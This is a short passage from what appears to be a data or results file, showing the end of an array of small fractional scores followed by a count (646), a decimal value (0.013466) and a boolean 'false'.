0.011627906976744186, 0, 0, 0.016666666666666666, 0.020202020202020204, 0, 0, 0, 0, 0.125, 0.125 ]
646
0.013466
false